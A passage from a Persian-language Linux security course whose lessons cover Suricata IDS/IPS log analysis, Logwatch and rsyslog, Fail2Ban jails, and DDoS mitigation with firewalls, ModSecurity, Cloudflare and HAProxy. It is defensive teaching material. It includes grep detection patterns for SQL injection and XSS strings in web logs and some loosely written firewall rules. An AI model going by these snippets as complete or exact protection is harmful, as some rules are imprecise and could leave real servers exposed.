۳) مشاهده و ثبت لاگ‌های بلاک‌شده:

sudo tail -f /var/log/suricata/drop.log

---

۸. مشاهده و تحلیل ترافیک شبکه با Suricata

۱) ثبت تمام بسته‌های شبکه و ذخیره در فایل pcap:

sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata --pcap

۲) مشاهده ترافیک ثبت‌شده در Wireshark:

wireshark /var/log/suricata/capture.pcap

۳) بررسی هشدارهای اخیر با tail

sudo tail -f /var/log/suricata/fast.log

۴) جستجوی یک IP خاص در لاگ‌ها:

sudo grep "192.168.1.100" /var/log/suricata/fast.log

---

۹. بهینه‌سازی عملکرد Suricata

۱) افزایش حافظه برای پردازش سریع‌تر:

max-pending-packets: 50000

۲) فعال کردن پردازش چندرشته‌ای:

detect-thread-ratio: 1.5

۳) کاهش نرخ False Positive در تشخیص تهدیدات:

threshold:
  default:
    track: by_src
    count: 10
    seconds: 60

---

جمع‌بندی

• Suricata یک سیستم تشخیص نفوذ (IDS)، سیستم پیشگیری از نفوذ (IPS) و تحلیلگر ترافیک شبکه (NSM) است که امکان تحلیل ترافیک شبکه را با دقت بالا فراهم می‌کند.
• به دلیل پشتیبانی از پردازش چندرشته‌ای، عملکرد بهتری نسبت به Snort دارد.
• Suricata را می‌توان برای مانیتورینگ، شناسایی تهدیدات، تحلیل لاگ‌ها و پیشگیری از حملات سایبری استفاده کرد.
• با ترکیب Suricata و iptables می‌توان یک فایروال هوشمند و انعطاف‌پذیر ایجاد کرد.

با اجرای این تنظیمات، Suricata به عنوان یک ابزار قدرتمند برای تحلیل و نظارت بر امنیت شبکه شما عمل خواهد کرد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تحلیل گزارشات IDS/IPS و واکنش به تهدیدات” subtitle=”توضیحات کامل”]سیستم‌های تشخیص نفوذ (IDS) و سیستم‌های پیشگیری از نفوذ (IPS) نقش مهمی در امنیت شبکه دارند. IDS‌ها وظیفه شناسایی تهدیدات را بر عهده دارند، در حالی که IPS‌ها علاوه بر شناسایی، قادر به جلوگیری از حملات نیز هستند.

در این بخش، به تحلیل گزارشات IDS/IPS و نحوه واکنش به تهدیدات شناسایی‌شده می‌پردازیم. ابزارهای مورد استفاده شامل Suricata، Snort، Fail2Ban و ELK Stack خواهند بود.

---

۱. بررسی لاگ‌های IDS/IPS و تشخیص حملات

هر IDS/IPS لاگ‌های مربوط به حملات را در مسیر مشخصی ذخیره می‌کند. بسته به ابزار استفاده‌شده، مسیر لاگ‌ها می‌تواند متفاوت باشد.

مسیر لاگ‌های مهم در Suricata:

نوع لاگ	مسیر
لاگ هشدارها	/var/log/suricata/fast.log
لاگ بسته‌های ضبط‌شده	/var/log/suricata/capture.pcap
لاگ حملات بلاک‌شده (در حالت IPS)	/var/log/suricata/drop.log

بررسی سریع لاگ هشدارهای Suricata:

sudo tail -f /var/log/suricata/fast.log

جستجوی هشدارهای مرتبط با یک IP خاص:

sudo grep "192.168.1.100" /var/log/suricata/fast.log

بررسی بسته‌های ضبط‌شده در Wireshark:

wireshark /var/log/suricata/capture.pcap

تحلیل لاگ‌های بلاک‌شده توسط IPS:

sudo cat /var/log/suricata/drop.log

---

۲. شناسایی نوع تهدید از طریق SID و دسته‌بندی حملات

هشدارهای IDS/IPS معمولاً دارای شناسه قوانین (SID – Signature ID) هستند که نشان می‌دهد کدام قانون باعث تولید هشدار شده است. برای تحلیل یک تهدید، باید SID را در پایگاه داده قوانین جستجو کنیم.

پیدا کردن SID در لاگ‌ها:

sudo cat /var/log/suricata/fast.log | grep "sid:"

جستجوی SID در قوانین Suricata:

sudo grep "1000001" /etc/suricata/rules/*.rules

مثال یک هشدار در لاگ Suricata:

02/28/2025-10:45:23.456789  [**] [1:1000001:1] ICMP Ping Detected [**] 
[Classification: Attempted Information Leak] [Priority: 2] 
{ICMP} 192.168.1.50 -> 192.168.1.100

در این مثال:

• SID: 1000001
• نوع حمله: Ping Sweep
• اولویت (Priority): 2 (متوسط)
• آدرس مبدا: 192.168.1.50
• آدرس مقصد: 192.168.1.100

مراحل بعدی: بررسی اینکه آیا این هشدار یک تهدید واقعی است یا یک False Positive.

---

۳. واکنش به تهدیدات شناسایی‌شده

بسته به شدت تهدید، اقدامات لازم برای واکنش به حملات شامل بلاک‌کردن IPهای مخرب، تغییر قوانین فایروال، هشدارهای خودکار و تحلیل بیشتر است.

الف) بلاک‌کردن IP مخرب با iptables

sudo iptables -A INPUT -s 192.168.1.50 -j DROP

ب) اضافه کردن IP به لیست بلاک Fail2Ban

sudo fail2ban-client set sshd banip 192.168.1.50

ج) ارسال هشدار ایمیلی با Logwatch

sudo logwatch --detail high --mailto admin@example.com

---

۴. اتوماسیون واکنش به تهدیدات با Fail2Ban

Fail2Ban ابزاری برای شناسایی و بلاک خودکار IPهای مشکوک است. در اینجا نحوه افزودن قوانین Fail2Ban برای بلاک تهدیدات IDS بررسی می‌شود.

ویرایش فایل Jail برای بلاک کردن حملات شناسایی‌شده توسط Suricata

sudo nano /etc/fail2ban/jail.local

افزودن پیکربندی زیر:

[suricata]
enabled = true
filter = suricata
logpath = /var/log/suricata/fast.log
maxretry = 3
bantime = 3600

ایجاد فیلتر برای شناسایی حملات در Suricata

sudo nano /etc/fail2ban/filter.d/suricata.conf

افزودن الگوی زیر برای شناسایی آی‌پی‌های مشکوک:

[Definition]
failregex = \[.*?\] \[.*?\] .*? \[Classification: .*?\] .*? {.*?} <HOST> -> .*

ریستارت کردن Fail2Ban برای اعمال تغییرات

sudo systemctl restart fail2ban

مشاهده لیست آی‌پی‌های بلاک‌شده:

sudo fail2ban-client status suricata

---

۵. تجزیه و تحلیل لاگ‌های IDS/IPS با ELK Stack

برای مدیریت بهتر لاگ‌های امنیتی و تحلیل دقیق‌تر، می‌توان از ELK Stack (Elasticsearch, Logstash, Kibana) استفاده کرد.

نصب Filebeat برای ارسال لاگ‌های IDS به ELK

sudo apt install filebeat -y

ویرایش پیکربندی Filebeat برای جمع‌آوری لاگ‌های Suricata

sudo nano /etc/filebeat/filebeat.yml

افزودن پیکربندی زیر:

filebeat.inputs:
  - type: log
    enabled: true
    paths:
      - /var/log/suricata/fast.log
    fields:
      log_type: suricata

ریستارت کردن Filebeat برای ارسال لاگ‌ها به ELK

sudo systemctl restart filebeat

تحلیل گرافیکی لاگ‌ها در Kibana

پس از ارسال لاگ‌ها، می‌توان در Kibana از Dashboardهای امنیتی برای بررسی تهدیدات استفاده کرد.

---

۶. جلوگیری از False Positive و بهینه‌سازی قوانین IDS

برخی حملات ممکن است False Positive باشند و نیاز به تنظیم قوانین دقیق‌تر دارند.

الف) کاهش هشدارهای کاذب در Suricata

threshold:
  default:
    track: by_src
    count: 5
    seconds: 60

ب) نادیده گرفتن یک IP خاص (Whitelisting)

vars:
  address-groups:
    IGNORE_NETS: "[192.168.1.1]"

ج) به‌روزرسانی Suricata برای دریافت قوانین جدید:

sudo suricata-update
sudo systemctl restart suricata

---

جمع‌بندی

• برای تحلیل گزارشات IDS/IPS، باید لاگ‌ها بررسی شده و تهدیدات شناسایی شوند.
• واکنش به تهدیدات شامل بلاک‌کردن IPها، ارسال هشدارها و تغییر تنظیمات امنیتی است.
• Fail2Ban می‌تواند برای بلاک خودکار آی‌پی‌های مشکوک مورد استفاده قرار گیرد.
• با استفاده از ELK Stack، امکان تحلیل گرافیکی و تجزیه و تحلیل دقیق لاگ‌ها وجود دارد.
• برای کاهش هشدارهای کاذب، باید قوانین IDS بهینه‌سازی شوند.

این روش‌ها به شما کمک می‌کنند تا امنیت شبکه را تقویت کرده و به تهدیدات در سریع‌ترین زمان ممکن واکنش نشان دهید.[/cdb_course_lesson][cdb_course_lesson title=”نظارت و آنالیز لاگ‌ها”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از ابزارهای Logwatch و Syslog برای جمع‌آوری لاگ‌ها” subtitle=”توضیحات کامل”]یکی از مهم‌ترین بخش‌های مدیریت امنیت و مانیتورینگ سرورها، جمع‌آوری، تحلیل و بررسی لاگ‌ها است. ابزارهای Logwatch و Syslog دو مورد از پرکاربردترین ابزارها برای نظارت بر لاگ‌های سیستمی و امنیتی هستند.

در این بخش، نحوه نصب، پیکربندی و استفاده از Logwatch و Syslog برای جمع‌آوری و تحلیل لاگ‌ها را بررسی می‌کنیم.

---

۱. معرفی Logwatch و کاربرد آن

Logwatch یک ابزار تحلیل لاگ است که به مدیران سیستم اجازه می‌دهد گزارش‌های خلاصه‌شده و دقیق از لاگ‌های سیستم دریافت کنند. این ابزار معمولاً برای شناسایی فعالیت‌های مشکوک، تحلیل ورودهای ناموفق و مانیتورینگ سرویس‌ها استفاده می‌شود.

ویژگی‌های کلیدی Logwatch:

• جمع‌آوری و دسته‌بندی لاگ‌ها از مسیرهای مختلف
• ارسال گزارش‌های منظم از لاگ‌های سیستم از طریق ایمیل
• قابلیت سفارشی‌سازی گزارش‌ها

---

۲. نصب و پیکربندی Logwatch

نصب Logwatch در سیستم‌های Debian/Ubuntu:

sudo apt update && sudo apt install logwatch -y

نصب Logwatch در سیستم‌های RHEL/CentOS:

sudo yum install logwatch -y

ویرایش تنظیمات اصلی Logwatch

فایل تنظیمات اصلی Logwatch در مسیر /etc/logwatch/conf/logwatch.conf قرار دارد. برای ویرایش آن از دستور زیر استفاده کنید:

sudo nano /etc/logwatch/conf/logwatch.conf

چند گزینه مهم برای تنظیم:

Detail = High  # میزان جزئیات گزارش (Low، Medium، High)
MailTo = admin@example.com  # آدرس ایمیل دریافت گزارش‌ها
Service = All  # فعال‌سازی گزارش‌گیری از همه سرویس‌ها
Range = yesterday  # تعیین بازه زمانی گزارش‌ها

اجرای Logwatch به‌صورت دستی و نمایش خروجی در ترمینال:

sudo logwatch --detail High --print

اجرای Logwatch و ارسال گزارش به ایمیل:

sudo logwatch --output mail --mailto admin@example.com --detail High

زمان‌بندی اجرای Logwatch با Cronjob

برای اجرای خودکار Logwatch هر روز ساعت ۲ بامداد، کرون‌جاب زیر را اضافه کنید:

sudo crontab -e

افزودن خط زیر:

0 2 * * * /usr/sbin/logwatch --output mail --mailto admin@example.com --detail High

---

۳. معرفی و کاربرد Syslog

Syslog یکی از استانداردهای اصلی برای مدیریت و انتقال لاگ‌های سیستم است. این پروتکل به مدیران سیستم امکان می‌دهد لاگ‌ها را از چندین منبع جمع‌آوری کرده و در یک سرور مرکزی ذخیره کنند.

ویژگی‌های کلیدی Syslog:

• ارسال لاگ‌های سیستم به یک سرور مرکزی
• پشتیبانی از چندین سطح لاگ مانند error، info و debug
• امکان فیلتر کردن و مرتب‌سازی لاگ‌ها

در این بخش از rsyslog که یک نسخه بهبودیافته از Syslog است، استفاده خواهیم کرد.

---

۴. نصب و پیکربندی rsyslog

نصب rsyslog در Debian/Ubuntu:

sudo apt update && sudo apt install rsyslog -y

نصب rsyslog در RHEL/CentOS:

sudo yum install rsyslog -y

فعال‌سازی و راه‌اندازی سرویس rsyslog:

sudo systemctl enable rsyslog
sudo systemctl start rsyslog

بررسی وضعیت سرویس rsyslog:

sudo systemctl status rsyslog

مشاهده لاگ‌های جمع‌آوری‌شده توسط rsyslog:

sudo tail -f /var/log/syslog

---

۵. پیکربندی سرور مرکزی Syslog

برای راه‌اندازی یک سرور مرکزی Syslog که لاگ‌های دیگر سرورها را جمع‌آوری کند، مراحل زیر را انجام دهید:

ویرایش فایل تنظیمات rsyslog در سرور مرکزی:

sudo nano /etc/rsyslog.conf

افزودن خطوط زیر برای پذیرش لاگ‌های ورودی از کلاینت‌ها:

# فعال‌سازی دریافت لاگ‌ها از طریق UDP
$ModLoad imudp
$UDPServerRun 514

# فعال‌سازی دریافت لاگ‌ها از طریق TCP
$ModLoad imtcp
$InputTCPServerRun 514

ریستارت کردن سرویس rsyslog برای اعمال تغییرات:

sudo systemctl restart rsyslog

ایجاد یک دایرکتوری برای لاگ‌های ورودی از کلاینت‌ها:

sudo mkdir -p /var/log/remote

افزودن تنظیمات ذخیره لاگ‌های کلاینت در فایل جداگانه:

sudo nano /etc/rsyslog.d/remote.conf

افزودن پیکربندی زیر:

$template RemoteLogs,"/var/log/remote/%HOSTNAME%/%PROGRAMNAME%.log"
*.* ?RemoteLogs

ریستارت مجدد سرویس rsyslog:

sudo systemctl restart rsyslog

---

۶. پیکربندی کلاینت برای ارسال لاگ‌ها به سرور مرکزی

ویرایش تنظیمات rsyslog در کلاینت:

sudo nano /etc/rsyslog.conf

افزودن این خطوط برای ارسال لاگ‌ها به سرور مرکزی:

*.* @192.168.1.10:514  # ارسال از طریق UDP
*.* @@192.168.1.10:514 # ارسال از طریق TCP

نکته: 192.168.1.10 باید با آدرس سرور Syslog جایگزین شود.

ریستارت کردن سرویس rsyslog در کلاینت:

sudo systemctl restart rsyslog

---

۷. تجزیه و تحلیل لاگ‌های جمع‌آوری‌شده

نمایش لاگ‌های دریافتی از کلاینت‌های مختلف:

sudo ls /var/log/remote/

مشاهده لاگ‌های یک کلاینت خاص:

sudo tail -f /var/log/remote/server1/syslog.log

فیلتر کردن لاگ‌های مربوط به یک سرویس خاص:

sudo grep "sshd" /var/log/remote/server1/syslog.log

---

۸. ترکیب Logwatch و rsyslog برای تحلیل دقیق‌تر لاگ‌ها

می‌توان از Logwatch در سرور Syslog مرکزی استفاده کرد تا گزارشات لاگ‌های دریافت‌شده از کلاینت‌ها را خلاصه و ارسال کند.

ویرایش فایل تنظیمات Logwatch:

sudo nano /etc/logwatch/conf/logwatch.conf

افزودن مسیر لاگ‌های سرور مرکزی:

LogFile = /var/log/remote/*

اجرای دستی Logwatch در سرور Syslog مرکزی:

sudo logwatch --detail High --print

---

جمع‌بندی

• Logwatch ابزاری برای تحلیل و ارسال گزارش‌های امنیتی از لاگ‌های سیستم است.
• rsyslog امکان جمع‌آوری، ارسال و ذخیره لاگ‌ها در یک سرور مرکزی را فراهم می‌کند.
• با استفاده از یک سرور مرکزی Syslog، می‌توان لاگ‌های چندین سرور را مدیریت و نظارت کرد.
• برای تحلیل بهتر لاگ‌ها، می‌توان از ترکیب Logwatch و rsyslog استفاده کرد.

این روش‌ها به مدیران سیستم کمک می‌کنند به‌سرعت فعالیت‌های مشکوک را شناسایی کرده و امنیت شبکه را افزایش دهند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”آنالیز لاگ‌ها و شناسایی حملات احتمالی” subtitle=”توضیحات کامل”]در امنیت سیستم‌ها، آنالیز لاگ‌ها یکی از مهم‌ترین اقدامات برای شناسایی حملات احتمالی است. تحلیل دقیق لاگ‌های سرور، شبکه و اپلیکیشن‌ها به مدیران کمک می‌کند تا فعالیت‌های مشکوک، حملات Brute Force، تلاش‌های نفوذ، بدافزارها و سایر تهدیدات امنیتی را شناسایی کنند.

در این بخش، روش‌های کاربردی برای جمع‌آوری، فیلتر کردن و تحلیل لاگ‌ها با ابزارهای مختلف بررسی خواهد شد.

---

۱. انواع لاگ‌های مهم برای تحلیل امنیتی

لاگ‌های سیستم‌عامل:

• /var/log/syslog → لاگ‌های عمومی سیستم
• /var/log/auth.log → لاگ‌های مربوط به ورود و احراز هویت (Debian/Ubuntu)
• /var/log/secure → لاگ‌های احراز هویت (RHEL/CentOS)
• /var/log/kern.log → لاگ‌های کرنل سیستم

لاگ‌های شبکه:

• /var/log/iptables.log → لاگ‌های فایروال iptables
• /var/log/nftables.log → لاگ‌های فایروال nftables
• /var/log/suricata/ → لاگ‌های IDS/IPS مثل Suricata یا Snort

لاگ‌های سرویس‌ها و برنامه‌ها:

• /var/log/nginx/access.log و /var/log/nginx/error.log → لاگ‌های سرور Nginx
• /var/log/apache2/access.log و /var/log/apache2/error.log → لاگ‌های سرور Apache
• /var/log/mysql.log → لاگ‌های دیتابیس MySQL
• /var/log/mail.log → لاگ‌های سرور ایمیل

---

۲. ابزارهای مورد استفاده برای آنالیز لاگ‌ها

۱. journalctl → مشاهده لاگ‌های سیستم در لینوکس

مشاهده لاگ‌های اخیر:

journalctl -n 50

مشاهده لاگ‌های مربوط به SSH:

journalctl -u sshd --since "1 hour ago"

مشاهده لاگ‌های ناموفق ورود:

journalctl -u sshd | grep "Failed password"

۲. grep → فیلتر کردن لاگ‌ها

جستجوی تمام تلاش‌های ناموفق ورود:

grep "Failed password" /var/log/auth.log

مشاهده لاگ‌های مرتبط با IP خاص:

grep "192.168.1.100" /var/log/auth.log

مشاهده تمام لاگ‌های خطا در Nginx:

grep "error" /var/log/nginx/error.log

۳. awk و sed → استخراج اطلاعات خاص از لاگ‌ها

استخراج IPهایی که بیشترین تلاش ناموفق ورود را داشته‌اند:

grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | head -10

مشاهده تمام درخواست‌های HTTP از یک IP خاص:

awk '{print $1, $7, $9}' /var/log/nginx/access.log | grep "192.168.1.100"

۴. logwatch → تولید گزارش‌های خلاصه از لاگ‌ها

نصب و اجرا:

sudo apt install logwatch -y
sudo logwatch --detail High --print

ارسال گزارش به ایمیل:

sudo logwatch --output mail --mailto admin@example.com --detail High

۵. goaccess → تحلیل لاگ‌های وب‌سرور به‌صورت گرافیکی

نصب و اجرا:

sudo apt install goaccess -y
sudo goaccess /var/log/nginx/access.log --log-format=COMBINED

مشاهده گزارش‌های گرافیکی در وب:

sudo goaccess /var/log/nginx/access.log -o /var/www/html/report.html --log-format=COMBINED

---

۳. شناسایی حملات احتمالی از روی لاگ‌ها

۱. حملات Brute Force روی SSH

بررسی تعداد تلاش‌های ورود ناموفق:

grep "Failed password" /var/log/auth.log | wc -l

مشاهده IPهایی که بیشترین تلاش ورود ناموفق داشته‌اند:

grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | head -10

۲. بررسی حملات DDoS روی وب‌سرور

مشاهده بیشترین درخواست‌های ارسال‌شده از یک IP:

awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -nr | head -10

مشاهده تعداد درخواست‌های دریافت‌شده در ۱۰ دقیقه اخیر:

grep "$(date --date='10 minutes ago' '+%d/%b/%Y:%H:%M')" /var/log/nginx/access.log | wc -l

۳. بررسی تلاش‌های SQL Injection در وب‌سرور

مشاهده درخواست‌های مشکوک شامل UNION SELECT یا DROP TABLE:

grep -iE "UNION.*SELECT|DROP TABLE" /var/log/nginx/access.log

۴. شناسایی حملات XSS (Cross-Site Scripting)

مشاهده درخواست‌های حاوی <script> در پارامترهای URL:

grep -iE "<script>" /var/log/nginx/access.log

---

۴. پاسخ به تهدیدات و اتوماتیک‌سازی واکنش‌ها

۱. مسدود کردن IPهای مخرب با iptables

sudo iptables -A INPUT -s 192.168.1.100 -j DROP

۲. استفاده از fail2ban برای جلوگیری از حملات Brute Force

نصب و پیکربندی:

sudo apt install fail2ban -y
sudo systemctl enable fail2ban
sudo systemctl start fail2ban

افزودن قوانین برای SSH در مسیر /etc/fail2ban/jail.local:

[sshd]
enabled = true
maxretry = 5
bantime = 3600
findtime = 600

ریستارت Fail2Ban:

sudo systemctl restart fail2ban

بررسی وضعیت:

sudo fail2ban-client status sshd

۳. ارسال هشدارهای امنیتی از طریق ایمیل

استفاده از logwatch برای ارسال هشدارها به ایمیل:

sudo logwatch --output mail --mailto security@example.com --detail High

---

جمع‌بندی

• لاگ‌های سیستم و سرویس‌ها را به‌طور مرتب بررسی کنید تا نشانه‌های فعالیت مشکوک را شناسایی کنید.
• از ابزارهایی مثل journalctl، grep، awk و sed برای فیلتر کردن لاگ‌ها و استخراج اطلاعات مهم استفاده کنید.
• با ابزارهایی مانند goaccess و logwatch، لاگ‌ها را تحلیل کنید و گزارش‌های دوره‌ای دریافت کنید.
• برای مقابله با حملات، قوانین امنیتی را با iptables و fail2ban تنظیم کنید و از ارسال هشدارهای ایمیلی استفاده کنید.

مدیریت صحیح لاگ‌ها و تحلیل دقیق آن‌ها به شما کمک می‌کند پیش از وقوع حملات، تهدیدات امنیتی را شناسایی و خنثی کنید.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از Fail2Ban برای مقابله با حملات” subtitle=”توضیحات کامل”]Fail2Ban یکی از ابزارهای مهم امنیتی برای شناسایی و مسدود کردن IPهای مشکوک است. این ابزار لاگ‌های سرویس‌های مختلف (مانند SSH، Nginx، Apache و غیره) را بررسی کرده و در صورت مشاهده تعداد زیادی تلاش ناموفق، IPهای مخرب را به‌طور خودکار مسدود می‌کند.

در این بخش، نصب، پیکربندی و بهینه‌سازی Fail2Ban برای مقابله با حملات توضیح داده خواهد شد.

---

۱. نصب و راه‌اندازی Fail2Ban

نصب Fail2Ban در سیستم‌های مختلف

روی Debian/Ubuntu:

sudo apt update && sudo apt install fail2ban -y

روی CentOS/RHEL:

sudo yum install epel-release -y
sudo yum install fail2ban -y

فعال‌سازی و اجرای Fail2Ban

sudo systemctl enable fail2ban
sudo systemctl start fail2ban

بررسی وضعیت سرویس Fail2Ban

sudo systemctl status fail2ban

---

۲. پیکربندی Fail2Ban برای مقابله با حملات

فایل پیکربندی اصلی Fail2Ban در مسیر زیر قرار دارد:

/etc/fail2ban/jail.conf

اما ویرایش مستقیم این فایل توصیه نمی‌شود. به جای آن، یک کپی جدید ایجاد کنید:

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

و فایل جدید را ویرایش کنید:

sudo nano /etc/fail2ban/jail.local

پارامترهای اصلی پیکربندی

در این فایل، می‌توان تنظیمات کلی مانند زمان مسدودسازی، تعداد تلاش‌های ناموفق و محدوده بررسی را تغییر داد:

[DEFAULT]
bantime = 3600   # زمان مسدودسازی IP به ثانیه (اینجا 1 ساعت)
findtime = 600   # بازه زمانی برای بررسی تلاش‌های ورود ناموفق
maxretry = 5     # تعداد مجاز تلاش‌های ناموفق قبل از مسدود شدن IP
ignoreip = 127.0.0.1/8 192.168.1.0/24  # لیست IPهایی که مسدود نمی‌شوند

---

۳. فعال‌سازی قوانین برای سرویس‌های مختلف

مقابله با حملات Brute Force روی SSH

برای جلوگیری از حملات Brute Force روی SSH، در فایل /etc/fail2ban/jail.local بخش زیر را اضافه کنید:

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log   # در سیستم‌های Debian/Ubuntu
# logpath = /var/log/secure    # در سیستم‌های RHEL/CentOS
maxretry = 5
bantime = 3600

محافظت از سرور Nginx در برابر حملات DDoS و Brute Force

افزودن پیکربندی زیر به فایل /etc/fail2ban/jail.local:

[nginx-botsearch]
enabled = true
port = http,https
filter = nginx-botsearch
logpath = /var/log/nginx/access.log
maxretry = 10
bantime = 7200

محافظت از سرور Apache

افزودن بخش زیر در /etc/fail2ban/jail.local:

[apache-auth]
enabled = true
port = http,https
filter = apache-auth
logpath = /var/log/apache2/error.log
maxretry = 5
bantime = 3600

محافظت از سرور MySQL در برابر حملات

افزودن قوانین برای جلوگیری از حملات Brute Force روی MySQL:

[mysqld-auth]
enabled = true
port = 3306
filter = mysqld-auth
logpath = /var/log/mysql/error.log
maxretry = 5
bantime = 3600

---

۴. بررسی و مدیریت Fail2Ban

بررسی وضعیت جیل‌های فعال (Jails)

sudo fail2ban-client status

مشاهده وضعیت جیل خاص (مثلاً SSH)

sudo fail2ban-client status sshd

بررسی لیست IPهای مسدود شده

sudo iptables -L -n

حذف یک IP از لیست مسدود شده

sudo fail2ban-client set sshd unbanip 192.168.1.100

ریستارت کردن Fail2Ban پس از تغییرات

sudo systemctl restart fail2ban

---

۵. ارسال هشدارهای امنیتی از طریق ایمیل

Fail2Ban می‌تواند هنگام مسدودسازی IPها ایمیل ارسال کند. برای فعال‌سازی این قابلیت، بخش زیر را در /etc/fail2ban/jail.local اضافه کنید:

destemail = security@example.com
sender = fail2ban@example.com
action = %(action_mwl)s

ریستارت Fail2Ban برای اعمال تغییرات:

sudo systemctl restart fail2ban

---

۶. تنظیم Fail2Ban برای استفاده از nftables به جای iptables

در توزیع‌های جدید لینوکس، nftables جایگزین iptables شده است. برای اطمینان از این که Fail2Ban از nftables استفاده می‌کند، مراحل زیر را انجام دهید:

۱. تغییر تنظیمات backend در /etc/fail2ban/jail.local

[DEFAULT]
banaction = nftables-multiport

۲. بررسی فعال بودن nftables

sudo nft list ruleset

۳. اعمال تغییرات

sudo systemctl restart fail2ban

---

جمع‌بندی

• Fail2Ban یک ابزار امنیتی قدرتمند برای شناسایی و مسدود کردن IPهای مخرب است.
• می‌توان آن را برای سرویس‌های مختلف مانند SSH، Nginx، Apache، MySQL و غیره پیکربندی کرد.
• از طریق Fail2Ban می‌توان حملات Brute Force، تلاش‌های ورود ناموفق و درخواست‌های مشکوک را شناسایی و مسدود کرد.
• امکان تنظیم ارسال ایمیل‌های هشدار و استفاده از nftables به جای iptables وجود دارد.
• Fail2Ban یک ابزار انعطاف‌پذیر است و با ترکیب آن با سایر راهکارهای امنیتی، می‌توان از امنیت سیستم به‌صورت بهتری محافظت کرد.

[/cdb_course_lesson][cdb_course_lesson title=”محافظت در برابر حملات DDoS”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از ابزارهای Mitigation DDoS” subtitle=”توضیحات کامل”]حملات DDoS (Distributed Denial of Service) از رایج‌ترین تهدیدهای امنیتی هستند که هدف آن‌ها ازکارانداختن سرویس‌ها و اشغال منابع سیستم با ارسال تعداد زیادی درخواست است. برای محافظت از سرورها و سرویس‌ها در برابر حملات DDoS، می‌توان از ابزارهای مختلفی برای شناسایی و کاهش اثر این حملات استفاده کرد.

در این بخش، روش‌های مختلف مقابله با DDoS را بررسی کرده و نحوه نصب، پیکربندی و استفاده از ابزارهای کاربردی مانند iptables, nftables, Fail2Ban, ModSecurity, Cloudflare, DDoS Deflate, و HAProxy را توضیح می‌دهیم.

---

۱. استفاده از iptables برای فیلتر کردن ترافیک مخرب

iptables یک فایروال قدرتمند در لینوکس است که می‌توان از آن برای مسدود کردن درخواست‌های مخرب استفاده کرد.

۱.۱. مسدود کردن آدرس‌های مشکوک به ارسال تعداد زیادی درخواست

sudo iptables -A INPUT -s 192.168.1.100 -j DROP

۱.۲. محدود کردن تعداد کانکشن‌های همزمان از یک IP

sudo iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 10 -j DROP

این دستور بیش از ۱۰ اتصال همزمان به پورت ۸۰ (HTTP) را از یک IP مسدود می‌کند.

۱.۳. مسدود کردن ترافیک SYN Flood

sudo iptables -A INPUT -p tcp --syn -m limit --limit 1/s -j ACCEPT

این دستور درخواست‌های SYN را به حداکثر یک عدد در ثانیه محدود می‌کند و از SYN Flood جلوگیری می‌کند.

۱.۴. مشاهده لیست قوانین فعال در iptables

sudo iptables -L -v

۱.۵. ذخیره و اعمال دائمی قوانین iptables

sudo iptables-save | sudo tee /etc/iptables/rules.v4

---

۲. استفاده از nftables برای مدیریت ترافیک ورودی

nftables جایگزین iptables در بسیاری از سیستم‌های مدرن لینوکس شده است و عملکرد بهتری دارد.

۲.۱. ایجاد جدول جدید برای مدیریت فایروال

sudo nft add table inet filter

۲.۲. ایجاد زنجیره برای بررسی بسته‌های ورودی

sudo nft add chain inet filter input { type filter hook input priority 0 \; }

۲.۳. محدود کردن تعداد درخواست‌های مکرر

sudo nft add rule inet filter input ip saddr 192.168.1.100 drop

۲.۴. ذخیره قوانین nftables

sudo nft list ruleset > /etc/nftables.conf

---

۳. استفاده از Fail2Ban برای مسدود کردن درخواست‌های مشکوک

Fail2Ban یک ابزار برای شناسایی و مسدود کردن IPهایی است که تعداد زیادی درخواست ناموفق ارسال می‌کنند.

۳.۱. نصب Fail2Ban

sudo apt install fail2ban -y  # برای Debian/Ubuntu
sudo yum install fail2ban -y  # برای RHEL/CentOS

۳.۲. پیکربندی برای جلوگیری از حملات روی Nginx و Apache

افزودن تنظیمات زیر به فایل /etc/fail2ban/jail.local:

[nginx-limit-req]
enabled = true
port = http,https
filter = nginx-limit-req
logpath = /var/log/nginx/access.log
maxretry = 10
bantime = 3600

۳.۳. ریستارت کردن Fail2Ban برای اعمال تغییرات

sudo systemctl restart fail2ban

---

۴. استفاده از ModSecurity برای حفاظت از وب‌سرورها

ModSecurity یک فایروال برنامه وب (WAF) است که از حملات DDoS و سایر حملات وب جلوگیری می‌کند.

۴.۱. نصب ModSecurity روی Nginx

sudo apt install libnginx-mod-security -y

۴.۲. فعال‌سازی ModSecurity

در فایل /etc/nginx/nginx.conf، خط زیر را اضافه کنید:

modsecurity on;
modsecurity_rules_file /etc/nginx/modsec/main.conf;

۴.۳. ریستارت Nginx برای اعمال تغییرات

sudo systemctl restart nginx

---

۵. استفاده از Cloudflare برای جلوگیری از حملات DDoS

Cloudflare یک سرویس CDN و امنیتی است که می‌تواند ترافیک مخرب را قبل از رسیدن به سرور شما فیلتر کند.

۵.۱. فعال‌سازی حالت “I’m Under Attack” در Cloudflare

۱. وارد داشبورد Cloudflare شوید.
۲. دامنه خود را انتخاب کنید.
۳. در بخش Security Level، گزینه I’m Under Attack Mode را فعال کنید.

۵.۲. تنظیم Rate Limiting در Cloudflare

۱. به بخش Firewall بروید.
2. در Rate Limiting، قوانینی مانند محدودیت درخواست‌های مکرر از یک IP را اضافه کنید.

---

۶. استفاده از HAProxy برای جلوگیری از DDoS

HAProxy یک Load Balancer قوی است که قابلیت‌های امنیتی برای کاهش حملات DDoS دارد.

۶.۱. محدود کردن تعداد درخواست‌های همزمان از یک IP

افزودن قوانین زیر به فایل /etc/haproxy/haproxy.cfg:

frontend http_front
   bind *:80
   tcp-request connection reject if { src_conn_rate gt 50 }
   tcp-request connection track-sc0 src
